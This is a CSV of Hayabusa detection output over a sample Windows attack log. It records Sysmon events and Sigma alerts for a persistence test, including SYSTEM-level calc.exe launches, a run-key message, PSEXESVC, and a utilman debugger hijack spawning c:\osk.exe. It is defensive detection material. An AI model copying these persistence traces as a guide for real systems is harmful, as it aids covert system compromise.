+2019-03-20 08:18:50.497 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\lsm.exe | Process: C:\Windows\System32\lsm.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 532 | PGUID: 365ABB72-777F-5C91-0000-0010EA5B0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:51.308 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 640 | PGUID: 365ABB72-7780-5C91-0000-00103C730000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:51.599 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\VBoxService.exe | Process: C:\Windows\System32\VBoxService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 704 | PGUID: 365ABB72-7780-5C91-0000-0010CFB00000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:51.679 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 904 | PGUID: 365ABB72-7781-5C91-0000-001040B90000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:51.789 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1016 | PGUID: 365ABB72-7781-5C91-0000-001036CB0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:53.111 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k GPSvcGroup | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1140 | PGUID: 365ABB72-7782-5C91-0000-00102D0B0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:53.501 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\Tasks\SA.DAT | Process: C:\Windows\system32\svchost.exe | PID: 1040 | PGUID: 365ABB72-7781-5C91-0000-0010C2CC0000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:53.571 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\spoolsv.exe | Process: C:\Windows\System32\spoolsv.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1412 | PGUID: 365ABB72-7783-5C91-0000-0010DB2C0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:53.922 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:53.922 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1536 | PGUID: 365ABB72-7783-5C91-0000-001025410100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:54.102 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: gpscript.exe /Startup | Process: C:\Windows\System32\gpscript.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k GPSvcGroup | LID: 0x3e7 | PID: 1616 | PGUID: 365ABB72-7794-5C91-0000-0010DF510100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:54.172 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1628 | PGUID: 365ABB72-77A2-5C91-0000-00106D560100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:54.172 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1636 | PGUID: 365ABB72-77A2-5C91-0000-00100A570100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:54.172 +09:00,PC01.example.corp,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:54.172 +09:00,PC01.example.corp,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:54.182 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:54.182 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1676 | PGUID: 365ABB72-77A2-5C91-0000-001006590100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:54.593 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Program Files\freeSSHd\FreeSSHDService.exe"" | Process: C:\Program Files\freeSSHd\FreeSSHDService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1788 | PGUID: 365ABB72-77C0-5C91-0000-001044720100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:54.603 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:54.603 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1820 | PGUID: 365ABB72-77C0-5C91-0000-00106C740100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:54.623 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\Temp\wodCmdTerm.exe | Process: C:\Program Files\freeSSHd\FreeSSHDService.exe | PID: 1788 | PGUID: 365ABB72-77C0-5C91-0000-001044720100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:54.783 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""taskhost.exe"" | Process: C:\Windows\System32\taskhost.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x17dad | PID: 1960 | PGUID: 365ABB72-77C4-5C91-0000-001013850100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:54.793 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: atbroker.exe | Process: C:\Windows\System32\AtBroker.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x17dad | PID: 1972 | PGUID: 365ABB72-77C4-5C91-0000-001011860100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:54.813 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\slui.exe"" | Process: C:\Windows\System32\slui.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x17dad | PID: 1988 | PGUID: 365ABB72-77C4-5C91-0000-0010EA870100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:55.224 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:55.224 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1100 | PGUID: 365ABB72-77DE-5C91-0000-00105EA30100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:55.404 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:55.404 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1308 | PGUID: 365ABB72-77FC-5C91-0000-0010E8C10100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:55.514 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:55.514 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1560 | PGUID: 365ABB72-781A-5C91-0000-001013CD0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:55.544 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:55.544 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1696 | PGUID: 365ABB72-7838-5C91-0000-0010E0D60100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:55.594 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:55.594 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 316 | PGUID: 365ABB72-7856-5C91-0000-00109FE20100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:55.654 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: gpscript.exe /Logon | Process: C:\Windows\System32\gpscript.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k GPSvcGroup | LID: 0x17dad | PID: 1028 | PGUID: 365ABB72-785E-5C91-0000-001031E60100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:55.654 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\userinit.exe | Process: C:\Windows\System32\userinit.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x17dad | PID: 1152 | PGUID: 365ABB72-785E-5C91-0000-0010C5E60100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:55.725 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\Explorer.EXE | Process: C:\Windows\explorer.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\userinit.exe | LID: 0x17dad | PID: 1928 | PGUID: 365ABB72-785E-5C91-0000-00103FEA0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:55.805 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: taskhost.exe $(Arg0) | Process: C:\Windows\System32\taskhost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 256 | PGUID: 365ABB72-7874-5C91-0000-0010F1020200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:55.835 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:55.835 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1264 | PGUID: 365ABB72-7874-5C91-0000-0010130B0200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:55.965 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\Sysmon.exe | Process: C:\Windows\Sysmon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 988 | PGUID: 365ABB72-7892-5C91-0000-0010DE160200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:56.055 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:56.055 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 584 | PGUID: 365ABB72-7893-5C91-0000-0010441C0200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:56.376 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:56.376 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 832 | PGUID: 365ABB72-78B1-5C91-0000-001001300200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:56.406 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\wlms\wlms.exe | Process: C:\Windows\System32\wlms\wlms.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1736 | PGUID: 365ABB72-78CF-5C91-0000-0010F23A0200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:56.626 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\wbem\unsecapp.exe -Embedding | Process: C:\Windows\System32\wbem\unsecapp.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3e7 | PID: 1596 | PGUID: 365ABB72-78CF-5C91-0000-0010BE4B0200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:57.237 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\UI0Detect.exe | Process: C:\Windows\System32\UI0Detect.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2180 | PGUID: 365ABB72-78D0-5C91-0000-00108A650200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:57.627 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x17dad | PID: 2332 | PGUID: 365ABB72-78D0-5C91-0000-0010F6710200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:58.278 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /c msg * ""hello from run key"" | Process: C:\Windows\System32\cmd.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x17dad | PID: 2572 | PGUID: 365ABB72-78D2-5C91-0000-0010D8A50200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:58.288 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\PSEXESVC.exe"" | Process: C:\Windows\PSEXESVC.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x17dad | PID: 2584 | PGUID: 365ABB72-78D2-5C91-0000-0010FFAB0200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:58.489 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: msg * ""hello from run key"" | Process: C:\Windows\System32\msg.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /c msg * ""hello from run key"" | LID: 0x17dad | PID: 2692 | PGUID: 365ABB72-78D3-5C91-0000-0010B0D30200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:18:58.989 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\slui.exe -Embedding | Process: C:\Windows\System32\slui.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x17dad | PID: 2844 | PGUID: 365ABB72-78D6-5C91-0000-0010CE170300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:19:04.187 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: taskhost.exe SYSTEM | Process: C:\Windows\System32\taskhost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3188 | PGUID: 365ABB72-78E8-5C91-0000-001054030400,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:19:10.796 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Process: C:\Windows\System32\mmc.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x17dad | PID: 3328 | PGUID: 365ABB72-78EE-5C91-0000-0010273F0400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:20:19.155 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x17dad | PID: 3496 | PGUID: 365ABB72-7933-5C91-0000-00100AD30600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:20:19.205 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\system32\utilman.exe | PID: 3508 | PGUID: 365ABB72-7933-5C91-0000-0010B7D40600,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:20:19.205 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x17dad | PID: 3508 | PGUID: 365ABB72-7933-5C91-0000-0010B7D40600,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:20:19.295 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""c:\osk.exe"" | Process: C:\osk.exe | User: EXAMPLE\user01 | Parent Cmd: utilman.exe /debug | LID: 0x17dad | PID: 3520 | PGUID: 365ABB72-7933-5C91-0000-00103CDB0600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:21:01.325 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Program Files\Windows Media Player\wmpnetwk.exe"" | Process: C:\Program Files\Windows Media Player\wmpnetwk.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 3836 | PGUID: 365ABB72-795D-5C91-0000-00105C070700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:21:48.323 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\slui.exe -Embedding | Process: C:\Windows\System32\slui.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x17dad | PID: 2004 | PGUID: 365ABB72-798B-5C91-0000-0010C8550A00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:23:41.105 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x17dad | PID: 3428 | PGUID: 365ABB72-79FC-5C91-0000-0010DBC60A00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:24:08.294 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\System32\Tasks\Microsoft\Windows Defender\MP Scheduled Scan | Process: C:\Windows\system32\svchost.exe | PID: 1040 | PGUID: 365ABB72-7781-5C91-0000-0010C2CC0000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
